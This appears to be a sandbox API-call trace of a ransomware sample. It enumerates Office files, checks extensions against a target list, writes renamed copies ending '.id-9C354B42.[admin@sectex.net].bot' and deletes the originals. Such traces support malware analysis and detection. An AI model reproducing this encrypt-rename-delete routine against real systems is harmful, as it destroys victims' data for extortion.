	[0143.276] lstrlenW (lpString=".jpg") returned 4
	[0143.276] lstrcmpiW (lpString1=".jpg", lpString2=".MMW") returned -1
	[0143.276] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0143.276] lstrlenW (lpString="ACCDDSUI.DLL") returned 12
	[0143.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0143.277] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=21424) returned 1
	[0143.277] CloseHandle (hObject=0x384) returned 1
	[0143.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll")) returned 0x20
	[0143.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0143.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60
	[0143.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60
	[0143.277] lstrlenW (lpString=".doc") returned 4
	[0143.277] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.277] lstrlenW (lpString=".docx") returned 5
	[0143.277] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1
	[0143.277] lstrlenW (lpString=".pdf") returned 4
	[0143.277] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.277] lstrlenW (lpString=".xls") returned 4
	[0143.277] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.369] lstrlenW (lpString=".xlsx") returned 5
	[0143.369] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1
	[0143.369] lstrlenW (lpString=".ppt") returned 4
	[0143.369] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60
	[0143.369] lstrlenW (lpString=".zip") returned 4
	[0143.369] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.369] lstrlenW (lpString=".rar") returned 4
	[0143.369] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.369] lstrlenW (lpString=".bz2") returned 4
	[0143.369] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.369] lstrlenW (lpString=".7z") returned 3
	[0143.369] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60
	[0143.369] lstrlenW (lpString=".dbf") returned 4
	[0143.369] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60
	[0143.369] lstrlenW (lpString=".1cd") returned 4
	[0143.369] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60
	[0143.369] lstrlenW (lpString=".jpg") returned 4
	[0143.369] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60
	[0143.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60
	[0143.369] lstrlenW (lpString=".doc") returned 4
	[0143.369] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.369] lstrlenW (lpString=".docx") returned 5
	[0143.369] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1
	[0143.369] lstrlenW (lpString=".pdf") returned 4
	[0143.369] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.369] lstrlenW (lpString=".xls") returned 4
	[0143.369] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.370] lstrlenW (lpString=".xlsx") returned 5
	[0143.370] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1
	[0143.370] lstrlenW (lpString=".ppt") returned 4
	[0143.370] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60
	[0143.370] lstrlenW (lpString=".zip") returned 4
	[0143.370] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.370] lstrlenW (lpString=".rar") returned 4
	[0143.370] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.370] lstrlenW (lpString=".bz2") returned 4
	[0143.370] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.370] lstrlenW (lpString=".7z") returned 3
	[0143.370] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60
	[0143.370] lstrlenW (lpString=".dbf") returned 4
	[0143.370] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60
	[0143.370] lstrlenW (lpString=".1cd") returned 4
	[0143.370] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60
	[0143.370] lstrlenW (lpString=".jpg") returned 4
	[0143.370] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.370] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0143.370] lstrlenW (lpString="ACCOLKI.DLL") returned 11
	[0143.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accolki.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.795] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=13240) returned 1
	[0143.795] CloseHandle (hObject=0x2a0) returned 1
	[0143.795] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accolki.dll")) returned 0x20
	[0143.806] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accolki.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accolki.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0143.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59
	[0143.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59
	[0143.949] lstrlenW (lpString=".doc") returned 4
	[0143.949] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.949] lstrlenW (lpString=".docx") returned 5
	[0143.949] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1
	[0143.949] lstrlenW (lpString=".pdf") returned 4
	[0143.949] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.949] lstrlenW (lpString=".xls") returned 4
	[0143.949] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.949] lstrlenW (lpString=".xlsx") returned 5
	[0143.949] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1
	[0143.949] lstrlenW (lpString=".ppt") returned 4
	[0143.949] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59
	[0143.949] lstrlenW (lpString=".zip") returned 4
	[0143.949] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.949] lstrlenW (lpString=".rar") returned 4
	[0143.949] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.949] lstrlenW (lpString=".bz2") returned 4
	[0143.949] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.949] lstrlenW (lpString=".7z") returned 3
	[0143.949] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59
	[0143.949] lstrlenW (lpString=".dbf") returned 4
	[0143.949] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59
	[0143.949] lstrlenW (lpString=".1cd") returned 4
	[0143.949] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59
	[0143.950] lstrlenW (lpString=".jpg") returned 4
	[0143.950] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59
	[0143.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59
	[0143.950] lstrlenW (lpString=".doc") returned 4
	[0143.950] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.950] lstrlenW (lpString=".docx") returned 5
	[0143.950] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1
	[0143.950] lstrlenW (lpString=".pdf") returned 4
	[0143.950] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.950] lstrlenW (lpString=".xls") returned 4
	[0143.950] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.950] lstrlenW (lpString=".xlsx") returned 5
	[0143.950] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1
	[0143.950] lstrlenW (lpString=".ppt") returned 4
	[0143.950] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59
	[0143.950] lstrlenW (lpString=".zip") returned 4
	[0143.950] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.950] lstrlenW (lpString=".rar") returned 4
	[0143.950] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.950] lstrlenW (lpString=".bz2") returned 4
	[0143.950] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.950] lstrlenW (lpString=".7z") returned 3
	[0143.950] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59
	[0143.950] lstrlenW (lpString=".dbf") returned 4
	[0143.950] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59
	[0143.950] lstrlenW (lpString=".1cd") returned 4
	[0143.950] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59
	[0143.951] lstrlenW (lpString=".jpg") returned 4
	[0143.951] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.951] lstrcmpiW (lpString1=".gta", lpString2=".bot") returned 1
	[0143.951] lstrlenW (lpString="Discussion.gta") returned 14
	[0143.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion.gta"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0143.958] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=104836) returned 1
	[0143.958] CloseHandle (hObject=0x3b0) returned 1
	[0143.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion.gta")) returned 0x20
	[0143.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion.gta.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion.gta"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.995] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.995] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion.gta.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0143.996] GetLastError () returned 0x0
	[0143.996] ReadFile (in: hFile=0x3c0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x19984, lpOverlapped=0x0) returned 1
	[0144.036] WriteFile (in: hFile=0x31c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x19990, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x19990, lpOverlapped=0x0) returned 1
	[0144.038] ReadFile (in: hFile=0x3c0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.038] WriteFile (in: hFile=0x31c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0144.038] SetEndOfFile (hFile=0x31c) returned 1
	[0144.039] CloseHandle (hObject=0x31c) returned 1
	[0144.039] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.039] SetEndOfFile (hFile=0x3c0) returned 1
	[0144.042] CloseHandle (hObject=0x3c0) returned 1
	[0144.042] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.043] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion.gta")) returned 1
	[0144.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62
	[0144.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62
	[0144.043] lstrlenW (lpString=".doc") returned 4
	[0144.043] lstrcmpiW (lpString1=".doc", lpString2=".gta") returned -1
	[0144.043] lstrlenW (lpString=".docx") returned 5
	[0144.043] lstrcmpiW (lpString1=".docx", lpString2="n.gta") returned -1
	[0144.043] lstrlenW (lpString=".pdf") returned 4
	[0144.043] lstrcmpiW (lpString1=".pdf", lpString2=".gta") returned 1
	[0144.043] lstrlenW (lpString=".xls") returned 4
	[0144.043] lstrcmpiW (lpString1=".xls", lpString2=".gta") returned 1
	[0144.043] lstrlenW (lpString=".xlsx") returned 5
	[0144.043] lstrcmpiW (lpString1=".xlsx", lpString2="n.gta") returned -1
	[0144.043] lstrlenW (lpString=".ppt") returned 4
	[0144.043] lstrcmpiW (lpString1=".ppt", lpString2=".gta") returned 1
	[0144.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62
	[0144.044] lstrlenW (lpString=".zip") returned 4
	[0144.044] lstrcmpiW (lpString1=".zip", lpString2=".gta") returned 1
	[0144.044] lstrlenW (lpString=".rar") returned 4
	[0144.044] lstrcmpiW (lpString1=".rar", lpString2=".gta") returned 1
	[0144.044] lstrlenW (lpString=".bz2") returned 4
	[0144.044] lstrcmpiW (lpString1=".bz2", lpString2=".gta") returned -1
	[0144.044] lstrlenW (lpString=".7z") returned 3
	[0144.044] lstrcmpiW (lpString1=".7z", lpString2="gta") returned -1
	[0144.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62
	[0144.044] lstrlenW (lpString=".dbf") returned 4
	[0144.044] lstrcmpiW (lpString1=".dbf", lpString2=".gta") returned -1
	[0144.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62
	[0144.044] lstrlenW (lpString=".1cd") returned 4
	[0144.044] lstrcmpiW (lpString1=".1cd", lpString2=".gta") returned -1
	[0144.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62
	[0144.044] lstrlenW (lpString=".jpg") returned 4
	[0144.044] lstrcmpiW (lpString1=".jpg", lpString2=".gta") returned 1
	[0144.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62
	[0144.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62
	[0144.044] lstrlenW (lpString=".doc") returned 4
	[0144.044] lstrcmpiW (lpString1=".doc", lpString2=".gta") returned -1
	[0144.044] lstrlenW (lpString=".docx") returned 5
	[0144.044] lstrcmpiW (lpString1=".docx", lpString2="n.gta") returned -1
	[0144.044] lstrlenW (lpString=".pdf") returned 4
	[0144.044] lstrcmpiW (lpString1=".pdf", lpString2=".gta") returned 1
	[0144.044] lstrlenW (lpString=".xls") returned 4
	[0144.044] lstrcmpiW (lpString1=".xls", lpString2=".gta") returned 1
	[0144.044] lstrlenW (lpString=".xlsx") returned 5
	[0144.044] lstrcmpiW (lpString1=".xlsx", lpString2="n.gta") returned -1
	[0144.044] lstrlenW (lpString=".ppt") returned 4
	[0144.044] lstrcmpiW (lpString1=".ppt", lpString2=".gta") returned 1
	[0144.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62
	[0144.044] lstrlenW (lpString=".zip") returned 4
	[0144.045] lstrcmpiW (lpString1=".zip", lpString2=".gta") returned 1
	[0144.045] lstrlenW (lpString=".rar") returned 4
	[0144.045] lstrcmpiW (lpString1=".rar", lpString2=".gta") returned 1
	[0144.045] lstrlenW (lpString=".bz2") returned 4
	[0144.045] lstrcmpiW (lpString1=".bz2", lpString2=".gta") returned -1
	[0144.045] lstrlenW (lpString=".7z") returned 3
	[0144.045] lstrcmpiW (lpString1=".7z", lpString2="gta") returned -1
	[0144.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62
	[0144.045] lstrlenW (lpString=".dbf") returned 4
	[0144.045] lstrcmpiW (lpString1=".dbf", lpString2=".gta") returned -1
	[0144.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62
	[0144.045] lstrlenW (lpString=".1cd") returned 4
	[0144.045] lstrcmpiW (lpString1=".1cd", lpString2=".gta") returned -1
	[0144.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62
	[0144.045] lstrlenW (lpString=".jpg") returned 4
	[0144.045] lstrcmpiW (lpString1=".jpg", lpString2=".gta") returned 1
	[0144.045] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0144.045] lstrlenW (lpString="DOORSCHD.VRD") returned 12
	[0144.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0144.048] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1723) returned 1
	[0144.048] CloseHandle (hObject=0x3c0) returned 1
	[0144.048] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd")) returned 0x20
	[0144.048] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0144.049] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.049] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.049] GetLastError () returned 0x0
	[0144.049] ReadFile (in: hFile=0x3c0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x6bb, lpOverlapped=0x0) returned 1
	[0144.051] WriteFile (in: hFile=0x31c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x6c0, lpOverlapped=0x0) returned 1
	[0144.052] ReadFile (in: hFile=0x3c0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.052] WriteFile (in: hFile=0x31c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.052] SetEndOfFile (hFile=0x31c) returned 1
	[0144.052] CloseHandle (hObject=0x31c) returned 1
	[0144.052] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.052] SetEndOfFile (hFile=0x3c0) returned 1
	[0144.054] CloseHandle (hObject=0x3c0) returned 1
	[0144.054] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.055] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd")) returned 1
	[0144.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60
	[0144.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60
	[0144.055] lstrlenW (lpString=".doc") returned 4
	[0144.055] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0144.055] lstrlenW (lpString=".docx") returned 5
	[0144.055] lstrcmpiW (lpString1=".docx", lpString2="D.VRD") returned -1
	[0144.055] lstrlenW (lpString=".pdf") returned 4
	[0144.055] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0144.055] lstrlenW (lpString=".xls") returned 4
	[0144.055] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0144.055] lstrlenW (lpString=".xlsx") returned 5
	[0144.055] lstrcmpiW (lpString1=".xlsx", lpString2="D.VRD") returned -1
	[0144.055] lstrlenW (lpString=".ppt") returned 4
	[0144.055] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0144.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60
	[0144.055] lstrlenW (lpString=".zip") returned 4
	[0144.056] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0144.056] lstrlenW (lpString=".rar") returned 4
	[0144.056] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0144.056] lstrlenW (lpString=".bz2") returned 4
	[0144.056] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0144.056] lstrlenW (lpString=".7z") returned 3
	[0144.056] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0144.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60
	[0144.056] lstrlenW (lpString=".dbf") returned 4
	[0144.056] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0144.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60
	[0144.056] lstrlenW (lpString=".1cd") returned 4
	[0144.056] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
